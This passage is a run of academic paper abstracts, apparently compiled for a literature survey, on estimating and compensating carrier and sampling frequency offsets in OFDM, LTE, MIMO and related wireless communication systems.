CFOs at the receiver so that the additional interference due to the residual CFOs from other users can be suppressed. Simulation results show that the proposed scheme can effectively eliminate the interference and significantly improve the system performance in the presence of CFOs. --- paper_title: A computationally efficient sampling frequency offset estimation for OFDM-based digital terrestrial television systems paper_content: Sampling frequency offset (SFO) that occurs due to a sampling frequency mismatch between the transmitter and receiver oscillators is one of the main problem in the orthogonal frequency division multiplexing (OFDM) based digital terrestrial television (DTTV) system. The SFO can cause an intersymbol interference and an intercarrier interference that may degrade the performance of an OFDM system and result in high bit error rate. Since the value of SFO is usually very low (part per million scale), the SFO estimation is very susceptible to a noise. In this paper, we propose the estimation method that can minimize the influence of the noise in SFO estimation and also minimize the computational complexity. The performance of the proposed method has been verified with computer simulation. The computer simulation results show that the proposed sampling frequency offset estimation is more efficient in computational complexity compared to the conventional method to achieve the similar performance. --- paper_title: A SAGE Approach to Frequency Recovery in OFDM Direct-Conversion Receivers paper_content: In-phase/quadrature (I/Q) imbalances are front-end impairments which may greatly complicate the synchronization task in a low-cost direct-conversion receiver (DCR). In this paper we investigate the possibility of using the space-alternating generalized expectation-maximization (SAGE) algorithm to recover the carrier frequency offset in OFDM terminals with a DCR architecture. Our study leads to a novel scheme that operates in a recursive fashion and exploits a conventional OFDM training preamble composed by several repeated parts. At each iteration, interference arising from I/Q impairments is subtracted from the received samples before updating the frequency estimate. The performance of the new scheme is assessed in terms of estimation accuracy and processing load by considering a wireless local area network (WLAN) compliant with the IEEE 802.11a standard. The main goal is to check whether the SAGE approach exhibits some advantages compared to existing alternatives. --- paper_title: Joint Estimation of Channel Impulse Response and Carrier Frequency Offset for OFDM Systems paper_content: In this paper, an order recursive method is proposed to solve the joint estimation of channel impulse response (CIR) and carrier frequency offset (CFO) for orthogonal frequency-division multiplexing (OFDM) transmission. As long as one can obtain the solution for Qth-order Taylor expansion, the solution for (Q + 1)th order can also be obtained via a simple recursive relation. The proposed recursive algorithm actually provides a method to handle any Qth-order Taylor expansion, instead of just the second order adopted in the technical literature. Significant improvement can be observed by adopting higher order approximation. Analytical mean-square-error (MSE) performance results are given, demonstrating the efficiency of the proposed algorithm. --- paper_title: FADAC-OFDM: Frequency-Asynchronous Distributed Alamouti-Coded OFDM paper_content: We propose frequency-asynchronous distributed Alamouti-coded orthogonal frequency-division multiplexing (FADAC-OFDM). The proposed scheme effectively mitigates the intercarrier interference (ICI) due to frequency offset (FO) between two distributed antennas. The transmitter side of the proposed scheme transmits each of the two subslots in Alamouti code through two remote subcarriers symmetric to the center frequency and is referred to as space–frequency reversal schemes by Wang et al. or Choi. The receiver side of the proposed scheme is significantly different from the conventional scheme or the scheme proposed by Wang et al. in that it performs two discrete Fourier transform (DFT), each of which is synchronized to each transmit antenna's carrier frequency. The decision variables are generated by performing a simple linear combining with the same complexity as that of the conventional Alamouti code. The derivation shows that in flat-fading channels, the dominant ICI components due to FO cancel each other during the combining process. The proposed scheme achieves almost the same performance as the ideal Alamouti scheme, even with large FO. To use this ICI self-cancellation property for selective fading channels or in cases with timing offset (TO) between two transmit antennas, the total subcarriers are divided into several subblocks, and the proposed scheme is applied to each subblock. For mildly selective channels or cases with practically small TO, the proposed scheme achieves significantly improved performance compared with the conventional space–frequency Alamouti-coded OFDM. --- paper_title: Modeling and Estimation of Transient Carrier Frequency Offset in Wireless Transceivers paper_content: Future wireless devices have to support many applications (e.g., remote robotics, wireless automation, and mobile gaming) with extremely low latency and reliability requirements over wireless connections. Optimizing wireless transceivers while switching between wireless connections with different circuit characteristics requires addressing many hardware impairments that have been overlooked previously. For instance, switching between transmission and reception radio functions to facilitate time-division duplexing can change the load on the power supply. As the supply voltage changes in response to the sudden change in load, the carrier frequency drifts. Such a drift results in transient carrier frequency offset (CFO) that cannot be estimated by conventional CFO estimators and is typically addressed by inserting or extending guard intervals. In this paper, we explore the modeling and estimation of the transient CFO, which is modeled as the response of an underdamped second order system. To compensate for the transient CFO, we propose a low complexity parametric estimation algorithm, which uses the null space of the Hankel-like matrix constructed from phase difference of the two halves of the repetitive training sequence. Furthermore, to minimize the mean squared error of the estimated parameters in noise, a weighted subspace fitting algorithm is derived with a slight increase in complexity. The Cramer-Rao bound for any unbiased estimator of the transient CFO parameters is derived. The performance of the proposed algorithms is also confirmed by the experimental results obtained from the real wireless transceivers. --- paper_title: Carrier frequency synchronization in the downlink of 3GPP LTE paper_content: In this paper, we investigate carrier frequency synchronization in the downlink of 3GPP Long Term Evolution (LTE). A complete carrier frequency offset estimation and compensation scheme based on standardized synchronization signals and reference symbols is presented. The estimation performance in terms of mean square error is derived analytically and compared to simulation results. The impact of estimation error on the system performance is shown in terms of uncoded bit error ratio and physical layer coded throughput. Compared to perfect synchronization, the presented maximum likelihood estimator shows hardly any performance loss, even when the most sophisticated MIMO schemes of LTE are employed. --- paper_title: MMSE Solution for OFDMA Systems with Carrier Frequency Offset Correction paper_content: The multi-access orthogonal frequency division multiplexing (OFDMA) technology has drawn a lot of attention in next generation wireless mobile communications. It is well-known that carrier frequency offsets in OFDMA systems can destroy the orthogonality among subcarriers and produce intercarrier interference (ICI) and multiuser interference (MUI). In our previous works, we proposed a common carrier frequency offset (CCFO) correction scheme at the OFDMA receiver, which can reduce the ICI/MUI effect and the bit error rate. In the scheme, the CFO correction can be performed by adaptively converging the MSE between the demodulated output and the decision feedback data. This paper studies the minimum MSE solution for the CCFO value, and the result is exploited to verify the adaptive CCFO estimation algorithm by means of the decision feedback. Simulation results show that the adaptive decision feedback scheme for CCFO estimation is effective and the minimum MSE performance is well achieved. --- paper_title: Carrier Frequency Offset Estimation for OFDM Systems Over Mobile Radio Channels paper_content: In this paper, a new technique is proposed for blind estimation of carrier frequency offset (CFO) in wireless orthogonal frequency-division multiplexing (OFDM) systems with constant-modulus constellations. The proposed scheme is based on the assumption that the channel slowly changes in the time domain with respect to the OFDM symbol duration. As a consequence, the channel effect on a given subcarrier in two consecutive OFDM symbols is approximately the same. Based on this assumption, a cost function is derived such that the power difference between all subcarriers in two consecutive OFDM symbols is minimized. Using Monte Carlo simulation, we demonstrate that the proposed scheme has superior performance in both static and time-varying frequency-selective fading channels. The proposed system can rapidly and accurately estimate the CFO using only three trial values, given that the CFO is less than half of the subcarriers' frequency spacing. --- paper_title: Sensitivity analysis of interleaved OFDMA system uplink to carrier frequency offset paper_content: This paper investigates the sensitivity analysis of orthogonal frequency division multiple access (OFDMA) systems to carrier frequency offset (CFO) in the uplink. This analysis uses simple superposition principle approach, where the effects of different users are studied separately. We calculate a closed-form expression for signal-to-interference ratio (SIR) and derive very simple expressions for inter-carrier interference (ICI) and multiple access interference (MAI) in interleaved subcarrier allocation scheme. Finally theoretical results are verified using Monte Carlo simulation. --- paper_title: Maximum likelihood algorithms for joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing system paper_content: Maximum likelihood (ML) algorithms, for the joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing (MIMO–OFDM) system, are investigated in this work. A system model that takes into account the effects of carrier frequency offset, sampling frequency offset, symbol timing error and channel impulse response is formulated. Cramer–Rao lower bounds for the estimation of continuous parameters are derived, which show the coupling effect among different impairments and the significance of the joint estimation. The authors propose an ML algorithm for the estimation of synchronisation impairments and channel together, using the grid search method. To reduce the complexity of the joint grid search in the ML algorithm, a modified ML (MML) algorithm with multiple one-dimensional searches is also proposed. Further, a stage-wise ML (SML) algorithm using existing algorithms, which estimate less number of parameters, is also proposed. Performance of the estimation algorithms is studied through numerical simulations and it is found that the proposed ML and MML algorithms exhibit better performance than SML algorithm. --- paper_title: A Semidefinite Relaxation Approach to Blind Despreading of Long-Code DS-SS Signal With Carrier Frequency Offset paper_content: Blind despreading of long-code direct sequence spread spectrum (DS-SS) signal with unknown carrier frequency offset (CFO) is considered. The maximum likelihood estimate (MLE) of spreading waveform is first derived, and to cope with the unknown CFO, we then use the semidefinite relaxation (SDR) technique to approximate our MLE problem as a convex semidefinite programming (SDP) problem, which can be solved efficiently using modern convex optimization methods. Simulation results demonstrate that the proposed approach significantly outperforms the dominant mode despreading estimator whether or not CFO exists at low signal to noise ratio (SNR). --- paper_title: Joint AOD and CFO estimation in wireless sensor networks localization system paper_content: Self-localization system of wireless sensor networks based on angle of departure (AOD) is studied in this paper. In AOD model, anchor node with multi-antenna transmits orthogonal pilot signals to sensor node with single antenna, which entitles the sensor node to function as equipping multi-antenna. Given that the limited number of antenna at anchor nodes will result in degree of freedom (DOF) deficiency at sensor node when dealing with more multipath components (MPC), we adopt a novel method without requiring extra antennas. The proposed algorithm simultaneously includes the oscillator mismatch between anchor node and sensor node, i.e., carrier frequency offset (CFO). With the aid of anchor's movement and CFO, the equivalent antenna array at sensor node is expended by synthetic aperture procedure to a much larger one, which subsequently improve the estimation ability to MPCs. In addition, the close-form solutions of CFO and AOD are also derived. The effectiveness and performance of proposed algorithm are demonstrated by numerical simulations. --- paper_title: Classification of Space-Time Block Codes Based on Second-Order Cyclostationarity with Transmission Impairments paper_content: Signal classification is important in various commercial and military applications. Multiple antenna systems complicate the signal classification problem since there is now the issue of estimating the number and configuration of transmit antennas. The novel blind classification algorithm proposed in this paper exploits the cyclostationarity property of space-time block codes (STBCs) for the classification of multiple antenna systems in the presence of possible transmission impairments. Analytical expressions for the second-order cyclic statistics used as the basis of the algorithm are derived, and the computational cost of the proposed algorithm is considered. This algorithm avoids the need for a priori knowledge of the channel coefficients, modulation, carrier phase, and timing offsets. Moreover, it does not need accurate information about the transmission data rate and carrier frequency offset. Monte Carlo simulation results demonstrate a good classification performance with low sensitivity to phase noise and channel effects, including frequency-selective fading and Doppler shift. --- paper_title: Joint Maximum Likelihood Estimation of CFO, Noise Power, and SNR in OFDM Systems paper_content: Estimation of noise power and signal-to-noise ratio (SNR) are fundamental tasks in wireless communications. Existing methods to recover these parameters in orthogonal frequency-division multiplexing (OFDM) are derived by following heuristic arguments and assuming perfect carrier frequency offset (CFO) synchronization. Hence, it is currently unknown how they compare with an optimum scheme performing joint maximum likelihood (ML) estimation of CFO, noise power and SNR. In the present work, the joint ML estimator of all these parameters is found by exploiting the repetitive structure of a training preamble composed of several identical parts. It turns out that CFO recovery is the first task that needs to be performed. After CFO compensation, the ML estimation of noise power and SNR reduces to a scheme that is available in the literature, but with a computational saving greater than 60% with respect to the original formulation. To assess the ultimate accuracy achievable by the ML scheme, novel expressions of the Cramer-Rao bound for the joint estimation of all unknown parameters are provided. --- paper_title: Efficient Phase-Error Suppression for Multiband OFDM-Based UWB Systems paper_content: This paper proposes an efficient phase-error suppression scheme for multiband (MB) orthogonal frequency-division multiplexing (OFDM)-based ultrawideband (UWB) communication systems. The proposed scheme consists of a clock-recovery loop and a common phase-error (CPE) tracking loop. The clock-recovery loop performs estimation of the sampling frequency offset (SFO) and its 2-D (time and frequency) compensation, while the CPE tracking loop estimates and corrects the phase errors caused by residual carrier frequency offset (CFO), residual SFO, and phase noise (PHN). The SFO and CPE estimators employ pilot-tone-based and channel-frequency-response (CFR)-weighted low-complexity approaches, each of which uses a robust error-reduction scheme without using angle calculations or divisions. Analytical results and numerical examples show the effectiveness of the proposed scheme in different multipath fading scenarios and signal-to-noise ratio (SNR) regimes. --- paper_title: A Subspace-Based Two-Way Ranging System Using a Chirp Spread Spectrum Modem, Robust to Frequency Offset paper_content: Herein, we propose and implement a subspace-based two-way ranging system for high resolution indoor ranging that is robust to frequency offset. Due to the frequency offset between wireless nodes, issues about sampling frequency offset (SFO) and carrier frequency offset (CFO) arise in range estimation. Although the problem of SFO is resolved by adopting the symmetric double-sided two-way ranging (SDS-TWR) protocol, the CFO of the received signals impacts the time-of-arrival (TOA) estimation, obtained by conventional subspace-based algorithms such as ESPRIT and MUSIC. Nevertheless, the CFO issue has not been considered with subspace-based TOA estimation algorithms.Our proposed subspace-based algorithm, developed for the robust TOA estimation to CFO, is based on the chirp spread spectrum (CSS) signals. Our subspace-based ranging system is implemented in FPGA with CSS modem using a hardware/software co-design methodology. Simulations and experimental results show that the proposed method can achieve robust ranging between the CSS nodes in an indoor environment with frequency offset. --- paper_title: Interference mitigation techniques for asynchronous multiple access communications in SIMO FBMC systems paper_content: In this paper we derive linear equalizers for FBMC systems. We focus on the multiple access channel where signals transmitted by different users may have different carrier frequency offsets and time delays. Aiming at reducing the bandwidth requirements of the periodic ranging messages we formulate two SIMO solutions that are tolerant to time and frequency misalignments. Simulation-based results show that the same performance can be achieved in the BER range [10−2, 10−4] in comparison to an OFDM multi-user minimum mean square error receiver. Considering a guard interval between users, the BER range in which FBMC and OFDM perform equally can be broadened. However, the OFDM solution requires a complexity 8.6 times higher and its spectral efficiency is reduced by 0.72 b/s/Hz due to the cyclic prefix. --- paper_title: OFDM Transmission scheme for asynchronous two-way multi-relay cooperative networks with analog network coding paper_content: For two-way relaying assisted by analog network coding, most investigation so far is based on perfect synchronization assumption. In contrast, in this paper we consider the more practical asynchronism assumption, and develop a new OFDM transmission scheme that is robust to the lack of synchronization in both timing and carrier frequency. In our scheme, the relays' signals are constructed by fusing several OFDM symbols received from the source nodes transmissions. The source node receivers can successfully demodulate the received OFDM signals after mitigating effectively multiple carrier frequency offsets and multiple timing phase offsets. Simulations are conducted to demonstrate its superior performance. This scheme has the same bandwidth efficiency as the conventional OFDM transmission, and can achieve the same relaying gain as the existing multiple relay transmissions. By relieving the stringent synchronization requirement, this scheme leads to simplified relay design, which makes it more practical to exploit multiple relays in two-way relaying networks. --- paper_title: Differential Carrier Frequency Offset and Sampling Frequency Offset Estimation for 3GPP LTE paper_content: The Long Term Evolution (LTE) system, like other OFDM based systems, is very sensitive to synchronization errors which must be estimated and compensated. In this paper, maximum-likelihood (ML) estimates of the Carrier Frequency Offset (CFO) and Sampling Frequency Offset (SFO) are investigated in the framework of LTE downlink, aiming at precisely tracking time-varying fluctuations of the impairments. In order to make the tracking independent of the time index of the OFDM symbol, the differential CFO and SFO tracking algorithm are proposed. Combined with the phase ambiguity cancellation scheme, the differential tracking algorithm can work with high accuracy. The performances are analyzed and evaluated through simulations. --- paper_title: Blind CFO estimation algorithm for OFDM systems by using generalized precoding and trilinear model paper_content: This paper discusses the blind carrier frequency offset (CFO) estimation for orthogonal frequency division multiplexing (OFDM) systems by utilizing trilinear decomposition and generalized precoding. Firstly, the generalized precoding is employed to obtain multiple covariance matrices which are requisite for the trilinear model, and then a novel CFO estimation algorithm is proposed for the OFDM system. Compared with both the joint diagonalizer and estimation of signal parameters via rotational invariant technique (ESPRIT), the proposed algorithm enjoys a better CFO estimation performance. Furthermore, the proposed algorithm can work well without virtual carriers. Simulation results illustrate the performance of this algorithm. --- paper_title: A Unified Framework for Interference Analysis of Noncoherent MFSK Wireless Communications paper_content: This paper presents a new unified analytical technique for accurate interference analysis of noncoherent M-ary frequency shift keying (MFSK) wireless communication systems in the presence of additive white Gaussian noise (AWGN) and multiple arbitrary interfering signals. New exact bit error rate expressions are derived for nonorthogonal noncoherent binary FSK in the presence of an arbitrary number of interfering signals having arbitrary spectral shapes at arbitrary frequency offsets. Furthermore, tight upper bounds for the symbol and bit error rates are given for noncoherent MFSK with arbitrary tone spacings. These results are extended to include MFSK signals experiencing Rayleigh, Nakagami-m or Rician fading. Some specific interference scenarios are analyzed in details, including jammers with a given Doppler-spread, direct sequence spread spectrum and orthogonal frequency division multiplexing signals, and a Poisson field of arbitrary interferers. --- paper_title: A non-coherent neighbor cell search scheme for LTE/LTE-A systems paper_content: A new neighbor cell search algorithm for LTE/LTE-A systems is presented in this paper. To improve the interference problem in channel estimation for coherent SSS detection in the conventional neighbor cell search approaches, we propose a non-coherent scheme that takes advantage of the similarity of channel responses at adjacent subcarriers. The proposed neighbor cell search procedure not only includes both PSS and SSS detection, but also can combat different carrier frequency offsets that the home cell signal and the neighbor cell signal may suffer. The removal of the home cell synchronization signals in our algorithm converts the neighbor cell PSS and SSS into new sequences for recognition, respectively. By examining the cross-correlation properties of the new sequences, we show that partial correlation can well detect the neighbor cell sector ID and group ID through the new sequences. From simulation results, it is also clear that the proposed algorithm has good detection results and outperforms the conventional coherent approaches. --- paper_title: Carrier Frequency Offset Estimation for OFDM Direct-Conversion Receivers paper_content: We investigate the problem of carrier frequency offset (CFO) recovery in an OFDM direct-conversion receiver plagued by both dc-offset and frequency-selective I/Q imbalance. In order to enlarge the frequency acquisition range, the CFO is divided into an integer part, which is multiple of the subcarrier spacing, plus a remaining fractional part. The fractional CFO is firstly estimated by resorting to the least-squares (LS) principle using a suitably designed training sequence. Since the exact LS solution requires a complete search over the frequency uncertainty range, we propose a simpler scheme that dispenses from any peak-search procedure. We also derive an approximated closed-form expression of the estimation accuracy that reveals useful for assessing the impact of various design parameters on the system performance. After computing the fractional CFO, the integer frequency error is eventually retrieved by following a weighted LS approach. Numerical simulations and theoretical analysis indicate that the proposed scheme can be used to obtain accurate CFO estimates with affordable complexity. --- paper_title: Alamouti Coding Scheme for AF Relaying With Doppler Shifts paper_content: In this paper, we propose an Alamouti-code-based relaying scheme for frequency asynchronous amplify-and-forward (AF) relay networks. Both the oscillator frequency offsets and the Doppler shifts among the distributed nodes are considered in our design. We employ orthogonal frequency-division multiplexing (OFDM) modulation at the source node and let the two relay nodes implement only simple operations, such as time reversal, conjugation, and amplification. We show that without Doppler shifts, the multiple carrier frequency offsets (CFOs) can be directly compensated at the destination, and the received signals exhibit an Alamouti-like structure. We further prove that full spatial diversity can be achieved by the fast symbol-wise detection when the oscillator frequency offset between the relay nodes is smaller than a certain threshold, which yields lower decoding complexity compared with the existing schemes. In the case with Doppler shifts, where the direct CFO compensation becomes impossible, we develop a repetition-aided Alamouti coding approach, by which full diversity can be nearly achieved from the fast symbol-wise detection. Numerical results are provided to corroborate the proposed studies. --- paper_title: Sequence Designs for Interference Mitigation in Multi-Cell Networks paper_content: We propose a training sequence that can be used at the handshaking stage for multi-cell networks. The proposed sequence is theoretically proved to enjoy several nice properties including constant amplitude, zero autocorrelation, and orthogonality in multipath channels. Moreover, the analytical results show that the proposed sequence can greatly reduce the multi-cell interference (MCI) induced by carrier frequency offset (CFO) to a negligible level. Therefore, the CFO estimation algorithms designed for single-user or single-cell environments can be slightly modified, and applied in multi-cell environments; an example is given for showing how to modify the estimation algorithms. Consequently, the computational complexity can be dramatically reduced. Simulation results show that the proposed sequences and the CFO estimation algorithms outperform conventional schemes in multi-cell environments. --- paper_title: Optimized Joint Timing Synchronization and Channel Estimation for OFDM Systems paper_content: This paper addresses training-sequence-based joint timing synchronization and channel estimation for orthogonal frequency division multiplexing (OFDM) systems. The proposed approach consists of three stages. First, a coarse timing offset estimate is obtained. Then an advanced timing, relative timing indices, and channel impulse response estimates are obtained by maximum-likelihood estimation based on a sliding observation vector. Finally, the fine time adjustment based on the minimum mean squared error criterion is performed. The simulation results show that the proposed approach has excellent performance of timing synchronization in several channel models at low signal-to-noise ratio (SNR) which is smaller than 1dB. Moreover, for a low-density parity-check coded 1x2 single-input multiple-output OFDM system with maximum ratio combining, zero bit-error-rate is achievable using our proposed approach when SNR exceeds 1dB. --- paper_title: A Front End for Discriminative Learning in Automatic Modulation Classification paper_content: This work presents a novel method for automatic modulation classification based on discriminative learning. The features are the ordered magnitude and phase of the received symbols at the output of the matched filter. The results using the proposed front end and support vector machines are compared to other techniques. Frequency offset is also considered and the results show that in this condition the new method significantly outperforms two cumulant-based classifiers. --- paper_title: Physical-layer transceiving techniques on data-aided orthogonal frequency-division multiplexing towards seamless service on vehicular communications paper_content: Frequency error, non-ideal channel estimation (CE) and inefficient seamless road side unit (RSU) service are critical issues occurring in conventional systems that are completely specified by current IEEE 802.11p standards. This study investigates novel techniques for achieving accurate frequency offset compensation and effective CE and RSU selection for handover in signal-overlapping areas. Recently, communications using data-aided orthogonal frequency-division multiplexing (DA-OFDM), such as pseudo-random-postfix OFDM and time-domain-synchronous OFDM (TDS-OFDM), have been actively studied because of their higher effectiveness, efficiency and better transmission quality. This study consists of three parts: (i) derivation of the maximum likelihood estimation for DA-OFDM, (ii) design of an accurate RSU selection scheme and (iii) implementation of a superior TD CE technique. Performance comparisons between the conventional and the proposed techniques are conducted through comprehensive computer simulations. --- paper_title: Implementation-friendly synchronisation algorithm for DVB-T2 paper_content: To support high-definition television, the revision of DVB-T, the terrestrial digital video broadcasting standard, has recently been developed under the abbreviation DVB-T2. The provision of the anticipated high data rate services requires highly accurate synchronisation and frequency acquisition and tracking. Setting out from the procedure defined by the DVB-T2 implementation guidelines provided by the DVB-T2 standardisation community, a modified, yet implementation-friendly synchronisation algorithm has been developed. Simulation results show a similar performance for synchronisation and frequency offset estimation, as well as the detection of the signalling information contained in the preamble P1 with a significant reduction of the implementation complexity. --- paper_title: Initial Synchronization Assisted by Inherent Diversity over Time-Varying Frequency-Selective Fading Channels paper_content: An initial synchronization technique based on novel estimations of the time error and carrier frequency offset (CFO) is investigated in this paper to operate in frequency-selective fading environments. Based on motivation from statistical derivations, a novel estimator is proposed by embedding matched filters (MFs) into the RAKE fingers to approach the modified Cramer-Rao lower bounds (MCRLBs). Meanwhile, a dual chirp signal is proven to have the ability to decorrelate the performances between the time-error and the CFO estimators. By taking advantage of pseudo-noise (PN) MFs, the individual channel tap-weighting coefficients can be extracted from the interpath interference on a path-by-path basis. The proposed technique is then built to approach the MCRLBs by taking advantage of the maximum ratio combining (MRC) criterion. In practice, the proposed technique can significantly outperform a conventional initial synchronization technique that is not assisted by the diversity in terms of higher probabilities of burst acquisition and lower mean-square errors (MSEs) on the time-error and CFO estimations over multipath fading channels. Comprehensive computer simulations were conducted to verify the improvements achieved using the technique that is statistically derived in this paper. --- paper_title: Maximum-likelihood based lock detectors for M-PSK carrier phase tracking loops paper_content: Carrier phase synchronisation is essential for coherent communications. Receivers typically use digital phase-locked loops (DPLLs) to acquire the carrier phase. The lock range of DPLLs, i.e. the range of frequency offsets that they can acquire, is usually significantly less than the initial frequency uncertainty in typical systems. Hence, acquisition is achieved by sweeping through the frequency uncertainty range, and stopping the sweep when the DPLL acquires the signal. Since the transmitted data symbols are in general unknown, successful acquisition is determined by a non-data aided carrier lock detector (CLD). In this reported work, a maximum-likelihood based CLD is derived which has low implementation complexity, and is better than existing CLDs while being impervious to errors in the receive Automatic Gain Control (AGC). --- paper_title: A Novel Algebraic Carrier Frequency Offset Estimator for ASTC-MIMO-OFDM Systems Over a Correlated Frequency-Selective Channel paper_content: This paper presents a new algebraic carrier frequency offset (CFO) estimation technique for multiple-input-multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) system, to overcome the sensitivity of algebraic space-time codes (ASTCs) to frequency synchronization in quasi-static correlated Rayleigh frequency-selective fading channels. The technique uses a preamble and is thus particularly suitable for burst-mode communications. The preamble consists of orthogonal training sequences that are simultaneously transmitted from the various transmit antennas. The proposed system exploits all subcarriers in the frequency domain, which provides a remarkable performance improvement, and reaches the Cramer-Rao lower bound (CRLB) at a high signal-to-noise ratio. The proposed method is compared with three known CFO estimators in the literature: Cyclic-Prefix-based (CP), Moose, and Classen techniques that show clear advantages. --- paper_title: Simultaneous Multiple Carrier Frequency Offsets Estimation for Coordinated Multi-Point Transmission in OFDM Systems paper_content: Orthogonal frequency division multiplexing (OFDM) combined with the coordinated multi-point (CoMP) transmission technique has been proposed to improve performance of the receivers located at the cell border. However, the inevitable carrier frequency offset (CFO) will destroy the orthogonality between subcarriers and induce strong inter-carrier interference (ICI) in OFDM systems. In a CoMP-OFDM system, the impact of CFO is more severe because of the mismatch in carrier frequencies among multiple transmitters. To reduce performance degradation, CFO estimation and compensation is essential. For simultaneous estimation of multiple CFOs, the performance of conventional CFO estimation schemes is significantly degraded by the mutual interference among the signals from different transmitters. In this work, our goal is to propose an effective approach that can simultaneously estimate multiple CFOs in the downlink by using the composite signal coming from multiple base stations corresponding to CoMP transmission. Based on the Zadoff-Chu sequences, we design an optimal set of training sequences, which minimizes the mutual interference and is robust to the variations in multiple CFOs. Then, we propose a maximum likelihood (ML)-based estimator, the robust multi-CFO estimation (RMCE) scheme, for simultaneous estimation of multiple CFOs. In addition, by incorporating iterative interference cancellation into the RMCE scheme, we propose an iterative scheme to further improve the estimation performance. According to the simulations, our scheme can eliminate the mutual interference effectively, approaching the Cramer-Rao bound performance. --- paper_title: Frequency-immune and low-complexity symbol timing synchronization scheme in OFDM systems paper_content: In this paper, we propose a simple time-domain replica correlation (TDRC) based symbol timing synchronization scheme in orthogonal frequency division multiplexing systems. By allocating a locally concatenated sequence of a base sequence and its modified sequence to total feasible frequency resources, we can achieve both hardware complexity and frequency offset reductions. The hardware complexity of a searcher is less than halved over existing TDRC-based schemes, such as long-term evolution (LTE) scheme [3] and a performance-efficient scheme [8]. Also the proposed scheme provides significant frequency offset immunity over the LTE scheme. The performance analysis and comparisons are made in terms of complexity and detection error probability. --- paper_title: Closed Form BER Expressions for BPSK OFDM Systems with Frequency Offset paper_content: This letter addresses the performance degradation caused by the presence of carrier frequency offset (CFO) in orthogonal frequency division multiplexing (OFDM) systems. Accurate closed form bit error rate (BER) expressions for BPSK-OFDM systems impaired by frequency offset are derived. The analysis is carried out for flat and frequency selective Rayleigh fading channels. Simulation results have been used to cross-check the accuracy of the theoretical analysis. --- paper_title: Blind carrier frequency offset estimator for multi-input multi-output-orthogonal frequency division multiplexing systems over frequency-selective fading channels paper_content: This study presents a new blind carrier frequency offset (CFO) estimation technique for multi-input multi-output (MIMO) orthogonal frequency division multiplexing (OFDM) systems employing space-time coding (STC). CFO estimation is crucial for OFDM systems to avoid the performance degradation because of the inter-carrier interference that results when the CFO is not estimated and compensated accurately. Based on the assumptions that the data symbols are selected from a constant modulus constellation and the channel is varying slowly over time, a new blind CFO estimator is proposed by minimising the power difference between all subcarriers in two consecutive STC blocks. Therefore the proposed system exploits all subcarriers in time and frequency domain, which provides a remarkable performance improvement over other techniques reported in the literature. The complexity of the proposed estimator is substantially reduced by approximating the cost function by a sinusoid that can be minimised using direct closed-form computations within one OFDM symbol period. Monte Carlo simulations are used to assess the performance of the proposed system by means of mean squared error (MSE) in both static and time-varying frequency-selective fading channels. The simulation results demonstrate that the proposed estimator can eliminate the MSE error floors that usually appear at moderate and high signal-to-noise ratios for the estimators that work only in frequency domain. --- paper_title: Multi-User Interference Cancellation Schemes for Carrier Frequency Offset Compensation in Uplink OFDMA paper_content: Each user in the uplink of an Division Multiple Access (OFDMA) system may experience a different carrier frequency offset (CFO). These uncorrected CFOs destroy the orthogonality among subcarriers, causing inter-carrier interference and multi-user interference, which degrade the system performance severely. In this paper, novel time-domain multi-user interference cancellation schemes for OFDMA uplink are proposed. They employ an architecture with multiple OFDMA-demodulators to compensate for the impacts of multi-user CFOs at the base station's side. Analytical and numerical evaluations show that the proposed schemes achieve a significant performance gain compared to the conventional receiver and a reference frequency-domain multi-user interference cancellation scheme. In a particular scenario, a maximum CFO of up to 40% of the subcarrier spacing can be tolerated, and the CFO-free performance is maintained in the OFDMA uplink. --- paper_title: Resource Block Basis MMSE Beamforming for Interference Suppression in LTE Uplink paper_content: This paper proposes a new method to suppress interference using antenna array for LTE uplink. The proposed method does not require knowledge on resource allocation of either interfering or communicating mobile stations, and thus it has a significant advantage of ease of implementation. An additional advantage of this method is parallelization and scalability for multi-core processing. This paper also proposes a novel iterative timing offset compensation to enable effective interference suppression. The proposed method has been successfully implemented on System-on-Chip consisting of multi-core DSP and ARM microprocessors and verified that it successfully suppresses interference in real time. --- paper_title: Frequency Synchronization for Multiuser MIMO-OFDM System Using Bayesian Approach paper_content: This paper addresses the problem of frequency synchronization in multiuser multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. Different from existing work, a Bayesian approach is used in the parameter estimation problem. In this paper, the Bayes estimator for carrier frequency offset (CFO) estimation is proposed and the Bayesian Cram'er-Rao bound (BCRB) is also derived in closed form. Direct implementation of the resultant estimation scheme with conventional methods is challenging since a high degree of mathematical sophistication is always required. To solve this problem, the Gibbs sampler is exploited with an efficient sample generation method. Simulation results illustrate the effectiveness of the proposed estimation scheme. --- paper_title: A Low-Power Low-Cost GFSK Demodulator With a Robust Frequency Offset Tolerance paper_content: A low-power low-cost Gaussian frequency shift keying demodulator with a robust frequency offset tolerance is presented. A novel automatic pulse duration calibration is employed to keep the pulse durations of the zero-crossing detection output constant against process variation. Additionally, a discrete-time differentiator is adopted to eliminate the negative effect of frequency offset and drift. The demodulator is implemented in a 0.18-μm CMOS process and the area is approximately 0.08 mm ::: 2 ::: . It can recover data even as the intermediate frequency drifts from 1.5 up to 3.7 MHz during demodulation and requires a signal-to-noise ratio of less than 16.5 dB for a 0.1% bit error rate. The circuit consumes only a 0.51-mA current from a 1.8-V supply. --- paper_title: A New Synchronization Scheme for OFDM-Based Cooperative Relay Systems paper_content: In cooperative relay systems, relayed signals propagate through different channels and are received at the destination node with distinct timing and carrier frequency offsets (CFOs). This feature makes synchronization a rather challenging task as compared with centralized multiple-input multiple-output systems. Unlike conventional preamble designs with good correlation properties only in time domain or frequency domain, a new preamble that has good correlation properties in both time domain and frequency domain is proposed for synchronization in orthogonal frequency-division multiplexing (OFDM) based cooperative relay systems. According to the proposed preamble, a synchronization scheme is developed and a practical threshold is derived that jointly considers the statistic distribution of the correlation function output and the inevitable interference originated from residual CFOs to assist fine timing synchronization. Simulation results verify that the proposed scheme provides notable performance improvement as compared with a previous related work. --- paper_title: An Unscented Kalman Filter for ICI Cancellation in High-Mobility OFDM System paper_content: OFDM system suffers from inter-carrier interference due to frequency offset produced by the movement of terminals. Several schemes have been proposed to mitigate this type of interference. In this paper, an unscented Kalman filter (UKF) based methodology is addressed to estimate the carrier frequency offset (CFO).We have compared the BER performance of UKF with other schemes and also analyzed the convergence as well as accuracy behavior between UKF and EKF. The simulation result shows that comparing to conventional non-iterative methods, UKF and EKF have higher accuracy and efficiency. Furthermore, UKF surpasses 